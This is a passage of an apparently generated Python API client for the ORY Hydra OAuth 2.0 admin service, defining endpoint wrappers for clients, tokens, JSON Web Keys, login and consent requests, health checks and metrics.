            'set',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {
            'set':
                (str,),
        },
        'attribute_map': {
            'set': 'set',
        },
        'location_map': {
            'set': 'path',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [],
    },
    api_client=api_client,
    callable=__delete_json_web_key_set
)
def __delete_o_auth2_client(
    self,
    id,
    **kwargs
):
    """Deletes an OAuth 2.0 Client  # noqa: E501

    Delete an existing OAuth 2.0 Client by its ID. OAuth 2.0 clients are
    used to perform OAuth 2.0 and OpenID Connect flows; make sure this
    endpoint is well protected and only callable by first-party
    components.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        id (str): The id of the OAuth 2.0 Client.

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        None, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['id'] = id
    return self.call_with_http_info(**kwargs)
self.delete_o_auth2_client = Endpoint(
    # DELETE /clients/{id}: remove an OAuth 2.0 client.
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/clients/{id}',
        'operation_id': 'delete_o_auth2_client',
        'http_method': 'DELETE',
        'servers': None,
    },
    params_map={
        'all': ['id'],
        'required': ['id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'id': (str,)},
        'attribute_map': {'id': 'id'},
        'location_map': {'id': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__delete_o_auth2_client
)
def __delete_o_auth2_token(
    self,
    client_id,
    **kwargs
):
    """Delete OAuth2 Access Tokens from a Client  # noqa: E501

    This endpoint deletes OAuth2 access tokens issued for a client from
    the database.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        client_id (str):

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        None, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['client_id'] = client_id
    return self.call_with_http_info(**kwargs)
self.delete_o_auth2_token = Endpoint(
    # DELETE /oauth2/tokens: delete a client's access tokens.
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/oauth2/tokens',
        'operation_id': 'delete_o_auth2_token',
        'http_method': 'DELETE',
        'servers': None,
    },
    params_map={
        'all': ['client_id'],
        'required': ['client_id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'client_id': (str,)},
        'attribute_map': {'client_id': 'client_id'},
        'location_map': {'client_id': 'query'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__delete_o_auth2_token
)
def __flush_inactive_o_auth2_tokens(
    self,
    **kwargs
):
    """Flush Expired OAuth2 Access Tokens  # noqa: E501

    This endpoint flushes expired OAuth2 access tokens from the database.
    A cutoff time can be supplied to keep recent tokens for auditing.
    Refresh tokens cannot be flushed; they are deleted automatically when
    performing the refresh flow.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Keyword Args:
        body (FlushInactiveOAuth2TokensRequest): [optional]
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        None, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    return self.call_with_http_info(**kwargs)
self.flush_inactive_o_auth2_tokens = Endpoint(
    # POST /oauth2/flush: flush expired access tokens.
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/oauth2/flush',
        'operation_id': 'flush_inactive_o_auth2_tokens',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': ['body'],
        'required': [],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'body': (FlushInactiveOAuth2TokensRequest,)},
        'attribute_map': {},
        'location_map': {'body': 'body'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json'],
    },
    api_client=api_client,
    callable=__flush_inactive_o_auth2_tokens
)
def __get_consent_request(
    self,
    consent_challenge,
    **kwargs
):
    """Get Consent Request Information  # noqa: E501

    Fetch information on a consent request. The consent provider uses the
    consent challenge (appended to its URL during an OAuth 2.0 flow) to
    look up the OAuth2 request and then tells ORY Hydra whether the
    subject accepted or rejected it.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        consent_challenge (str):

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        ConsentRequest, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['consent_challenge'] = consent_challenge
    return self.call_with_http_info(**kwargs)
self.get_consent_request = Endpoint(
    # GET /oauth2/auth/requests/consent: look up a consent request.
    settings={
        'response_type': (ConsentRequest,),
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/consent',
        'operation_id': 'get_consent_request',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['consent_challenge'],
        'required': ['consent_challenge'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'consent_challenge': (str,)},
        'attribute_map': {'consent_challenge': 'consent_challenge'},
        'location_map': {'consent_challenge': 'query'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_consent_request
)
def __get_json_web_key(
    self,
    kid,
    set,
    **kwargs
):
    """Fetch a JSON Web Key  # noqa: E501

    This endpoint returns a singular JSON Web Key, identified by the set
    and the specific key ID (kid).  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        kid (str): The kid of the desired key
        set (str): The set

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        JSONWebKeySet, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['kid'] = kid
    # NOTE: the parameter name 'set' shadows the builtin, but it is part
    # of the generated public interface and must stay unchanged.
    kwargs['set'] = set
    return self.call_with_http_info(**kwargs)
self.get_json_web_key = Endpoint(
    # GET /keys/{set}/{kid}: fetch one key from a key set.
    settings={
        'response_type': (JSONWebKeySet,),
        'auth': [],
        'endpoint_path': '/keys/{set}/{kid}',
        'operation_id': 'get_json_web_key',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['kid', 'set'],
        'required': ['kid', 'set'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'kid': (str,),
            'set': (str,),
        },
        'attribute_map': {
            'kid': 'kid',
            'set': 'set',
        },
        'location_map': {
            'kid': 'path',
            'set': 'path',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_json_web_key
)
def __get_json_web_key_set(
    self,
    set,
    **kwargs
):
    """Retrieve a JSON Web Key Set  # noqa: E501

    Retrieve a JWK Set stored in ORY Hydra. A JSON Web Key (JWK) is a JSON
    data structure that represents a cryptographic key, and a JWK Set
    represents a set of JWKs. ORY Hydra uses this functionality to store
    keys used for TLS and JSON Web Tokens, and allows storing user-defined
    keys as well.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        set (str): The set

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        JSONWebKeySet, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    # 'set' shadows the builtin but is part of the generated interface.
    kwargs['set'] = set
    return self.call_with_http_info(**kwargs)
self.get_json_web_key_set = Endpoint(
    # GET /keys/{set}: retrieve a whole key set.
    settings={
        'response_type': (JSONWebKeySet,),
        'auth': [],
        'endpoint_path': '/keys/{set}',
        'operation_id': 'get_json_web_key_set',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['set'],
        'required': ['set'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'set': (str,)},
        'attribute_map': {'set': 'set'},
        'location_map': {'set': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_json_web_key_set
)
def __get_login_request(
    self,
    login_challenge,
    **kwargs
):
    """Get a Login Request  # noqa: E501

    Fetch information on a login request. The login provider (identity
    provider) uses the login challenge, appended to its URL during an
    OAuth 2.0 flow, to look up the OAuth2 request and then accept or
    reject the requested authentication process.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        login_challenge (str):

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        LoginRequest, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['login_challenge'] = login_challenge
    return self.call_with_http_info(**kwargs)
self.get_login_request = Endpoint(
    # GET /oauth2/auth/requests/login: look up a login request.
    settings={
        'response_type': (LoginRequest,),
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/login',
        'operation_id': 'get_login_request',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['login_challenge'],
        'required': ['login_challenge'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'login_challenge': (str,)},
        'attribute_map': {'login_challenge': 'login_challenge'},
        'location_map': {'login_challenge': 'query'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_login_request
)
def __get_logout_request(
    self,
    logout_challenge,
    **kwargs
):
    """Get a Logout Request  # noqa: E501

    Use this endpoint to fetch a logout request.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        logout_challenge (str):

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        LogoutRequest, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['logout_challenge'] = logout_challenge
    return self.call_with_http_info(**kwargs)
self.get_logout_request = Endpoint(
    # GET /oauth2/auth/requests/logout: look up a logout request.
    settings={
        'response_type': (LogoutRequest,),
        'auth': [],
        'endpoint_path': '/oauth2/auth/requests/logout',
        'operation_id': 'get_logout_request',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['logout_challenge'],
        'required': ['logout_challenge'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'logout_challenge': (str,)},
        'attribute_map': {'logout_challenge': 'logout_challenge'},
        'location_map': {'logout_challenge': 'query'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_logout_request
)
def __get_o_auth2_client(
    self,
    id,
    **kwargs
):
    """Get an OAuth 2.0 Client.  # noqa: E501

    Get an OAuth 2.0 client by its ID. This endpoint never returns
    passwords. Make sure this endpoint is well protected and only callable
    by first-party components.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        id (str): The id of the OAuth 2.0 Client.

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        OAuth2Client, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['id'] = id
    return self.call_with_http_info(**kwargs)
self.get_o_auth2_client = Endpoint(
    # GET /clients/{id}: fetch an OAuth 2.0 client.
    settings={
        'response_type': (OAuth2Client,),
        'auth': [],
        'endpoint_path': '/clients/{id}',
        'operation_id': 'get_o_auth2_client',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['id'],
        'required': ['id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'id': (str,)},
        'attribute_map': {'id': 'id'},
        'location_map': {'id': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_o_auth2_client
)
def __get_version(
    self,
    **kwargs
):
    """Get Service Version  # noqa: E501

    This endpoint returns the service version, typically notated using
    semantic versioning. If the service supports TLS Edge Termination,
    this endpoint does not require the `X-Forwarded-Proto` header to be
    set.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Keyword Args:
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        Version, or the request thread when called asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    return self.call_with_http_info(**kwargs)
self.get_version = Endpoint(
    # GET /version: report the service version.
    settings={
        'response_type': (Version,),
        'auth': [],
        'endpoint_path': '/version',
        'operation_id': 'get_version',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [],
        'required': [],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {},
        'attribute_map': {},
        'location_map': {},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__get_version
)
def __introspect_o_auth2_token(
    self,
    token,
    **kwargs
):
    """Introspect OAuth2 Tokens  # noqa: E501

    The introspection endpoint allows checking whether a token (both
    refresh and access) is active or not. An active token is neither
    expired nor revoked; if it is active, additional information on the
    token is included.  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread instead (call thread.get() for the result).

    Args:
        token (str): The string value of the token. For access tokens,
            this is the \\\"access_token\\\" value returned from the token
            endpoint defined in OAuth 2.0. For refresh tokens, this is
            the \\\"refresh_token\\\" value returned.

    Keyword Args:
        scope (str): An optional, space separated list of required
            scopes; if the access token was not granted one of them,
            active will be false. [optional]
        Standard client options: async_req, _return_http_data_only,
        _preload_content, _request_timeout, _check_input_type,
        _check_return_type, _host_index.

    Returns:
        OAuth2TokenIntrospection, or the request thread when called
        asynchronously.
    """
    # Apply the standard option defaults without clobbering caller values.
    for _opt, _default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[_opt] = kwargs.get(_opt, _default)
    kwargs['_host_index'] = kwargs.get('_host_index')
    kwargs['token'] = token
    return self.call_with_http_info(**kwargs)
self.introspect_o_auth2_token = Endpoint(
    # POST /oauth2/introspect: check whether a token is active.
    settings={
        'response_type': (OAuth2TokenIntrospection,),
        'auth': [],
        'endpoint_path': '/oauth2/introspect',
        'operation_id': 'introspect_o_auth2_token',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': ['token', 'scope'],
        'required': ['token'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'token': (str,),
            'scope': (str,),
        },
        'attribute_map': {
            'token': 'token',
            'scope': 'scope',
        },
        'location_map': {
            'token': 'form',
            'scope': 'form',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/x-www-form-urlencoded'],
    },
    api_client=api_client,
    callable=__introspect_o_auth2_token
)
def __is_instance_alive(self, **kwargs):
    """Check Alive Status  # noqa: E501

    This endpoint returns a 200 status code when the HTTP server is up running. This status does currently not include checks whether the database connection is working. If the service supports TLS Edge Termination, this endpoint does not require the `X-Forwarded-Proto` header to be set. Be aware that if you are running multiple nodes of this service, the health status will never refer to the cluster state, only to a single instance.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.is_instance_alive(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        HealthStatus, or the request thread when called asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /health/alive (no parameters).
self.is_instance_alive = Endpoint(
    settings={
        'response_type': (HealthStatus,),
        'auth': [],
        'endpoint_path': '/health/alive',
        'operation_id': 'is_instance_alive',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [],
        'required': [],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {},
        'attribute_map': {},
        'location_map': {},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__is_instance_alive
)
def __list_o_auth2_clients(self, **kwargs):
    """List OAuth 2.0 Clients  # noqa: E501

    This endpoint lists all clients in the database, and never returns client secrets. As a default it lists the first 100 clients. The `limit` parameter can be used to retrieve more clients, but it has an upper bound at 500 objects. Pagination should be used to retrieve more than 500 objects. OAuth 2.0 clients are used to perform OAuth 2.0 and OpenID Connect flows. Usually, OAuth 2.0 clients are generated for applications which want to consume your OAuth 2.0 or OpenID Connect capabilities. To manage ORY Hydra, you will need an OAuth 2.0 Client as well. Make sure that this endpoint is well protected and only callable by first-party components. The \"Link\" header is also included in successful responses, which contains one or more links for pagination, formatted like so: '<https://hydra-url/admin/clients?limit={limit}&offset={offset}>; rel=\"{page}\"', where page is one of the following applicable pages: 'first', 'next', 'last', and 'previous'. Multiple links can be included in this header, and will be separated by a comma.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.list_o_auth2_clients(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        limit (int): The maximum amount of policies returned, upper
            bound is 500 policies. [optional]
        offset (int): The offset from where to start looking. [optional]
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        [OAuth2Client], or the request thread when called asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /clients with optional query pagination.
self.list_o_auth2_clients = Endpoint(
    settings={
        'response_type': ([OAuth2Client],),
        'auth': [],
        'endpoint_path': '/clients',
        'operation_id': 'list_o_auth2_clients',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['limit', 'offset'],
        'required': [],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'limit': (int,),
            'offset': (int,),
        },
        'attribute_map': {
            'limit': 'limit',
            'offset': 'offset',
        },
        'location_map': {
            'limit': 'query',
            'offset': 'query',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__list_o_auth2_clients
)
def __list_subject_consent_sessions(self, subject, **kwargs):
    """Lists All Consent Sessions of a Subject  # noqa: E501

    This endpoint lists all subject's granted consent sessions, including client and granted scope. If the subject is unknown or has not granted any consent sessions yet, the endpoint returns an empty JSON array with status code 200 OK. The \"Link\" header is also included in successful responses, which contains one or more links for pagination, formatted like so: '<https://hydra-url/admin/oauth2/auth/sessions/consent?subject={user}&limit={limit}&offset={offset}>; rel=\"{page}\"', where page is one of the following applicable pages: 'first', 'next', 'last', and 'previous'. Multiple links can be included in this header, and will be separated by a comma.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.list_subject_consent_sessions(subject, async_req=True)
    >>> result = thread.get()

    Args:
        subject (str):

    Keyword Args:
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        [PreviousConsentSession], or the request thread when called
        asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['subject'] = subject
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /oauth2/auth/sessions/consent.
self.list_subject_consent_sessions = Endpoint(
    settings={
        'response_type': ([PreviousConsentSession],),
        'auth': [],
        'endpoint_path': '/oauth2/auth/sessions/consent',
        'operation_id': 'list_subject_consent_sessions',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['subject'],
        'required': ['subject'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'subject': (str,),
        },
        'attribute_map': {
            'subject': 'subject',
        },
        'location_map': {
            'subject': 'query',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__list_subject_consent_sessions
)
def __prometheus(self, **kwargs):
    """Get Snapshot Metrics from the Hydra Service.  # noqa: E501

    If you're using k8s, you can then add annotations to your deployment like so: ``` metadata: annotations: prometheus.io/port: \"4445\" prometheus.io/path: \"/metrics/prometheus\" ``` If the service supports TLS Edge Termination, this endpoint does not require the `X-Forwarded-Proto` header to be set.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.prometheus(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
        async_req (bool): execute the request asynchronously.

    Returns:
        None, or the request thread when called asynchronously.
    """
    # Fill in every transport option the caller did not supply.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    return self.call_with_http_info(**kwargs)
# Endpoint descriptor for GET /metrics/prometheus (no parameters, no body).
self.prometheus = Endpoint(
    settings={
        'response_type': None,
        'auth': [],
        'endpoint_path': '/metrics/prometheus',
        'operation_id': 'prometheus',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': [],
        'required': [],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {},
        'attribute_map': {},
        'location_map': {},
        'collection_format_map': {},
    },
    headers_map={
        'accept': [],
        'content_type': [],
    },
    api_client=api_client,
    callable=__prometheus
)
def __reject_consent_request(self, consent_challenge, **kwargs):
    """Reject a Consent Request  # noqa: E501

    When an authorization code, hybrid, or implicit OAuth 2.0 Flow is initiated, ORY Hydra asks the login provider to authenticate the subject and then tell ORY Hydra now about it. If the subject authenticated, he/she must now be asked if the OAuth 2.0 Client which initiated the flow should be allowed to access the resources on the subject's behalf. The consent provider which handles this request and is a web app implemented and hosted by you. It shows a subject interface which asks the subject to grant or deny the client access to the requested scope (\"Application my-dropbox-app wants write access to all your private files\"). The consent challenge is appended to the consent provider's URL to which the subject's user-agent (browser) is redirected to. The consent provider uses that challenge to fetch information on the OAuth2 request and then tells ORY Hydra if the subject accepted or rejected the request. This endpoint tells ORY Hydra that the subject has not authorized the OAuth 2.0 client to access resources on his/her behalf. The consent provider must include a reason why the consent was not granted. The response contains a redirect URL which the consent provider should redirect the user-agent to.  # noqa: E501

    Synchronous by default; pass async_req=True to run the request in a
    background thread and get that thread back instead of the result.

    >>> thread = api.reject_consent_request(consent_challenge, async_req=True)
    >>> result = thread.get()

    Args:
        consent_challenge (str):

    Keyword Args:
        body (RejectRequest): [optional]
        _return_http_data_only (bool): if True (the default), return only
            the response payload, without status code and headers.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse object without reading/decoding the
            body. Default is True.
        _request_timeout (float/tuple): request timeout; either a total
            number of seconds or a (connection, read) pair.
            Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the
            server. Default is True.
        _host_index (int/None): index of the server to use; read from
            the configuration when None.
